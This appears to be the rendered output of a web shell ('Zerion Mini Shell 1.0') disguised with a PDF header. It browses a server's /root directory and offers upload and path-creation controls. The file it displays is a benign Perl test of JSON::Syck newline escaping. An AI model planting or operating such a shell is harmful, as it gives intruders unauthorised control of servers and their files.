%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /root/.cpanm/work/1590825950.14464/YAML-Syck-1.32/t/
Upload File :
Create Path :
Current File : //root/.cpanm/work/1590825950.14464/YAML-Syck-1.32/t/json-newline.t

use JSON::Syck;
use Test::More tests => 1;

my $dump = JSON::Syck::Dump( { a => "hello\nworld\n" } );
is $dump, q({"a":"hello\nworld\n"});


Zerion Mini Shell 1.0